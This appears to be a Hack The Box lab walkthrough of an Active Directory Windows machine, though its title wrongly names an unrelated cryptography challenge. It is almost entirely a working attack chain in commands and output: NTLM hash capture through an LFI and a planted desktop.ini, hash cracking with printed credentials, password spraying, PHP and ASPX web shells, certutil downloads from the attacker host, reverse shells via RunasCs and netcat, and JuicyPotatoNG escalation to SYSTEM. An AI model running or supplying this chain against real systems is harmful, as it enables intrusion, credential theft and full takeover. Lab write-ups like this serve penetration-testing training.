HTB Brevi Moduli Solution (Without SageMath)
HTB Cryptography Challenge
# Step 1 - Find active ports
nmap -p- --min-rate 10000 10.129.228.120
# Step 2 - Focus scan on the active ports found
nmap -A -T4 -Pn -p53,80,135,139,389,445,464,593,636,3268,3269,9389 10.129.228.120
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 03:43 EST
Nmap scan report for 10.129.228.120
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: g0 Aviation
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-19T15:43:25
|_ start_date: N/A
|_clock-skew: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.32 seconds
Examining the results of our nmap scan, we can see the typical ports of a Domain Controller open.
Doing some AD uncredentialed enumeration and examining the website didnt give us any interesting findings.
Lets add flight.htb to /etc/hosts and do some vhost enumeration:
echo "10.129.228.120 flight.htb" | sudo tee -a /etc/hosts
Now we can use Gobuster to enumerate vhosts:
gobuster vhost -u http://flight.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -r
Examining the results, we can see that we got a valid result:
school.flight.htb
Lets add it to /etc/hosts:
echo "10.129.228.120 school.flight.htb" | sudo tee -a /etc/hosts
Lets examine the new vhost:
http://school.flight.htb/
If we click around, we will see that the URL of the website change like this:
http://school.flight.htb/index.php?view=home.html
http://school.flight.htb/index.php?view=about.html
http://school.flight.htb/index.php?view=blog.html
Examining the URL, we can see how the website interacts to get the pages, maybe we have a possible LFI vulnerability? Lets find it out!
Since its a Windows AD machine, I will create a SMB server on Kali and try to get a connection from the target machine to capture any NTLM hashes:
# Start SMB server on Kali
impacket-smbserver -smb2support kalishare .
# Enter the following URL on the web browser
http://school.flight.htb/index.php?view=//10.10.14.206/kalishare
Nice! We got a NTLMv2 hash in our running SMB server:
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:2f09827e4d999aed87f103013253fc75:010100000000000080a4c91b613adb01ca7aabb2b203d22e00000000010010004900500048006100460066006700560003001000490050004800610046006600670056000200100049004a004200570047007000540041000400100049004a004200570047007000540041000700080080a4c91b613adb0106000400020000000800300030000000000000000000000000300000f14ec98eb174c7fff2d0b0a2341a17003ddae9abef30be4f3dc7809f913d88bc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200300036000000000000000000
[*] Closing down connection (10.129.228.120,49723)
Lets try to crack it:
# Put the hash into a text file and save it as svc_apache_hash.txt
echo 'svc_apache::flight:aaaaaaaaaaaaaaaa:2f09827e4d999aed87f103013253fc75:010100000000000080a4c91b613adb01ca7aabb2b203d22e00000000010010004900500048006100460066006700560003001000490050004800610046006600670056000200100049004a004200570047007000540041000400100049004a004200570047007000540041000700080080a4c91b613adb0106000400020000000800300030000000000000000000000000300000f14ec98eb174c7fff2d0b0a2341a17003ddae9abef30be4f3dc7809f913d88bc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200300036000000000000000000' > svc_apache_hash.txt
# Use hashcat to crack it
hashcat -m 5600 svc_apache_hash.txt /usr/share/wordlists/rockyou.txt
We were able to crack the hash successfully and got the following credentials:
svc_apache:S@Ss!K@*t13
Now that we have the credentials of svc_apache, we can try to enumerate the users on the domain:
impacket-GetADUsers -all -dc-ip 10.129.228.120 flight.htb/svc_apache:'S@Ss!K@*t13' | awk 'NR>3 {print $1}' >> domain_users.txt
Remove the first 2 lines and we will get a clean list with only the domain users we found:
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum
Now that we got a list of valid domain user names, we can try checking if there is some password reuse and see if any user is using the same password as svc_apache.
Lets enumerate Domain Password Policy before we try any Password Spraying:
nxc smb 10.129.228.120 -u 'svc_apache' -p 'S@Ss!K@*t13' --pass-pol
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [+] Dumping password info for domain: flight
SMB 10.129.228.120 445 G0 Minimum password length: 7
SMB 10.129.228.120 445 G0 Password history length: 24
SMB 10.129.228.120 445 G0 Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.228.120 445 G0
SMB 10.129.228.120 445 G0 Password Complexity Flags: 000001
SMB 10.129.228.120 445 G0 Domain Refuse Password Change: 0
SMB 10.129.228.120 445 G0 Domain Password Store Cleartext: 0
SMB 10.129.228.120 445 G0 Domain Password Lockout Admins: 0
SMB 10.129.228.120 445 G0 Domain Password No Clear Change: 0
SMB 10.129.228.120 445 G0 Domain Password No Anon Change: 0
SMB 10.129.228.120 445 G0 Domain Password Complex: 1
SMB 10.129.228.120 445 G0
SMB 10.129.228.120 445 G0 Minimum password age: 1 day 4 minutes
SMB 10.129.228.120 445 G0 Reset Account Lockout Counter: 30 minutes
SMB 10.129.228.120 445 G0 Locked Account Duration: 30 minutes
SMB 10.129.228.120 445 G0 Account Lockout Threshold: None
SMB 10.129.228.120 445 G0 Forced Log off Time: Not Set
Notice that the value of Account Lockout Threshold is None. This is the green light we need before starting a Password Spraying attack.
Lets use the password of svc_apache and check for credentials reuse:
nxc smb 10.129.228.120 -u domain_users.txt -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [-] flight.htb\Name:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\--------------------:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
Nice! It seems like the user S.Moon is using the same password. This gave us the following new credentials:
S.Moon:S@Ss!K@*t13
Lets see what we can do with the user S.Moon. I will start enumerating the permissions on SMB shares:
nxc smb 10.129.228.120 -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ
It seems like S.Moon has write permissions on the Shared SMB share.
This reminds me at some past CTF I did… maybe we can try putting a link somehow to capture the hash of another user who might click on that file.
To do this exploit and try capturing hashes, I will first start a SMB server on Kali again:
impacket-smbserver -smb2support kalishare .
The next thing I will do is create an .ini file containing a link to the SMB server on my Kali:
cat desktop.ini
[.ShellClassInfo]
IconResource=\\10.10.14.206\kalishare
Lets now access the Shared SMB share using S.Moon and put the file desktop.ini there:
impacket-smbclient flight.htb/S.Moon:'S@Ss!K@*t13'@10.129.228.120
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web
# use Shared
# ls
drw-rw-rw- 0 Tue Nov 19 11:30:52 2024 .
drw-rw-rw- 0 Tue Nov 19 11:30:52 2024 ..
# put desktop.ini
# ls
drw-rw-rw- 0 Tue Nov 19 11:38:55 2024 .
drw-rw-rw- 0 Tue Nov 19 11:38:55 2024 ..
-rw-rw-rw- 56 Tue Nov 19 11:38:55 2024 desktop.ini
It worked! We got some the hash of the user C.Bum:
[*] AUTHENTICATE_MESSAGE (flight.htb\c.bum,G0)
[*] User G0\c.bum authenticated successfully
[*] c.bum::flight.htb:aaaaaaaaaaaaaaaa:584588b60ab913233947aecb454a883c:0101000000000000806fcae0663adb017fdbccb5ee16d1d400000000010010004900500048006100460066006700560003001000490050004800610046006600670056000200100049004a004200570047007000540041000400100049004a0042005700470070005400410007000800806fcae0663adb0106000400020000000800300030000000000000000000000000300000f14ec98eb174c7fff2d0b0a2341a17003ddae9abef30be4f3dc7809f913d88bc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200300036000000000000000000
[*] Closing down connection (10.129.228.120,56781)
[*] Remaining connections []
Lets try to crack the hash:
# Put the hash into a text file and save it as svc_apache_hash.txt
echo 'c.bum::flight.htb:aaaaaaaaaaaaaaaa:584588b60ab913233947aecb454a883c:0101000000000000806fcae0663adb017fdbccb5ee16d1d400000000010010004900500048006100460066006700560003001000490050004800610046006600670056000200100049004a004200570047007000540041000400100049004a0042005700470070005400410007000800806fcae0663adb0106000400020000000800300030000000000000000000000000300000f14ec98eb174c7fff2d0b0a2341a17003ddae9abef30be4f3dc7809f913d88bc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200300036000000000000000000' > c_bum_hash.txt
# Use hashcat to crack it
hashcat -m 5600 c_bum_hash.txt /usr/share/wordlists/rockyou.txt
We managed to successfully crack the hash of the user c.bum, giving us the following credentials:
C.Bum:Tikkycoll_431012284
Lets check what we can do with the user C.Bum. We can try checking SMB shares permission first:
nxc smb 10.129.228.120 -u C.Bum -p 'Tikkycoll_431012284' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\C.Bum:Tikkycoll_431012284
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ,WRITE
It seems like we have write permission on the Web share. My first idea when seeing this was to upload a .php shell there and see if we can trigger it. Lets try that!
I will use the PHP Ivan Sincek reverse shell and name it shell.php. You can get it from revshells.com.
Connect using impacket-smbclient and upload it:
impacket-smbclient flight.htb/C.Bum:'Tikkycoll_431012284'@10.129.228.120
Type help for list of commands
# use Web
# ls
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 .
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 ..
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 flight.htb
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 school.flight.htb
# cd flight.htb
# ls
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 .
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 ..
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 css
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 images
-rw-rw-rw- 7069 Thu Sep 22 16:17:00 2022 index.html
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 js
# put shell.php
# ls
drw-rw-rw- 0 Tue Nov 19 11:49:25 2024 .
drw-rw-rw- 0 Tue Nov 19 11:49:25 2024 ..
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 css
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 images
-rw-rw-rw- 7069 Thu Sep 22 16:17:00 2022 index.html
drw-rw-rw- 0 Tue Nov 19 11:47:00 2024 js
-rw-rw-rw- 9291 Tue Nov 19 11:49:25 2024 shell.php
Now start our nc listener on Kali:
nc -lvnp 8443
After that, use the following URL to access our shell.php and trigger it:
http://10.129.228.120/shell.php
Nice! We got a response on our nc listener:
listening on [any] 8443 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.228.120] 56823
SOCKET: Shell has connected! PID: 4692
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\flight.htb>whoami
flight\svc_apache
With the svc_apache account there is not much we can do, lets try to get access as another user.
Enumerating the system we found the port 8000 running on the target, it didnt appear in our nmap scan.
Being the port 8000, I can try guessing its probably a website. Lets redirect it with chisel.exe:
# Move chisel.exe
# On Kali
python3 -m http.server 80
# On target CLI
certutil.exe -urlcache -split -f http://10.10.14.206/chisel.exe
Run chisel:
# On Kali
chisel server --reverse --port 51234
# On target CLI
powershell
.\chisel.exe client 10.10.14.206:51234 R:65432:127.0.0.1:8000
Lets now access it with our web browser:
http://127.0.0.1:65432
And there is the hidden website!
Lets get more information about it with whatweb:
whatweb http://127.0.0.1:65432
http://127.0.0.1:65432 [200 OK] Bootstrap, Country[RESERVED][ZZ], Frame, Google-API[ajax/libs/jquery/1.10.2/jquery.min.js], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[127.0.0.1], JQuery[1.10.2,1.11.2], Microsoft-IIS[10.0], Modernizr[2.8.3-respond-1.4.2.min], Script[text/javascript], Title[Flight - Travel and Tour], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge], YouTube
This is a Microsoft IIS website. The directories of these kind of websites are located at C:\inetpub. We cant access the C:\inetpub directory with svc_apache and S.Moon, but C.Bum would probably give us access.
Lets create another shell.php to open another shell session using PHP Ivan Sincek reverse shell, our first shell is forwarding with chisel.exe:
# Copy the shell.php
cp shell.php shell2.php
# Edit port 8443 to 8080
sudo gedit shell2.php
# Upload into Web SMB share with impacket-smbclient
# Start nc listener
nc -lvnp 8080
# Access the following URL to trigger the reverse shell
http://10.129.228.120/shell2.php
After getting a second shell, we can try to get access as C.Bum.
First upload RunasCs.exe:
cd C:\Users\svc_apache\Desktop
certutil.exe -urlcache -split -f http://10.10.14.206/RunasCs.exe
After moving both files, start another nc listener:
nc -lvnp 9001
RunasCs.exe has a very nice parameter -r, which will grand us a reverse shell.
Using the following command, we will get a response on our nc listener:
powershell
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.206:9001 cmd
Nice! It worked, we got a shell as C.Bum:
listening on [any] 9001 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.228.120] 57127
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
Now we can get the user.txt flag:
type C:\Users\C.Bum\Desktop\user.txt
Use RunasCs.exe and nc listeners to create multiple shell sessions, just in case we need them:
# On Kali
nc -lvnp 9301
nc -lvnp 9302
nc -lvnp 9303
nc -lvnp 9304
# On target CLI
powershell
cd C:\Users\svc_apache\Desktop
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.206:9301 cmd
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.206:9302 cmd
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.206:9303 cmd
.\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.206:9304 cmd
Now that we have a shell as C.Bum, we can upload a cmdasp.aspx shell and try interacting with it through the web browser thanks to the local port 8000 hidden website we forwarded before.
Doing some enumeration inside C:\inetpub we found out that we website is located at C:\inetpub\development.
Lets upload cmdasp.aspx to the following folder:
cd C:\inetpub\development
certutil.exe -urlcache -split -f http://10.10.14.206/cmdasp.aspx
Now we can access our interactive cmdasp.aspx shell visiting the following URL:
http://127.0.0.1:65432/cmdasp.aspx
We can run the following command there and see what we get:
whoami /all
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
It seems like this user has the infamous potato privilege SeImpersonatePrivilege enabled.
Lets get a true shell before we continue.
Go to revshells.com, get a PowerShell#3 (base64) reverse shell configured with kali tun0 IP and port 9005, start nc listener on Kali port 9005 and enter it on the cmdasp.aspx website interactive shell command input, then press execute.
We will get a response on our nc listener:
listening on [any] 9005 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.228.120] 56446
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>
Now that we got a true shell, I will use JuicyPotatoNG to exploit and abuse this privilege.
Lets move le potato and nc.exe:
cd C:\Users\Public
certutil.exe -urlcache -split -f http://10.10.14.206/JuicyPotatoNG.exe
certutil.exe -urlcache -split -f http://10.10.14.206/nc.exe
After that, use icacls to grant permissions for everyone:
icacls nc.exe /grant Users:F
icacls JuicyPotatoNG.exe /grant Users:F
Start nc listener on Kali:
nc -lvnp 9201
Run JuicyPotatoNG.exe as follow:
C:\Users\Public\JuicyPotatoNG.exe -t * -p C:\Users\Public\nc.exe -a "10.10.14.206 9201 -e cmd.exe"
We got a response in our nc listening, giving us access as system:
listening on [any] 9201 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.228.120] 50121
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>whoami
whoami
nt authority\system
Now we can get the root.txt flag:
type C:\Users\Administrator\Desktop\root.txt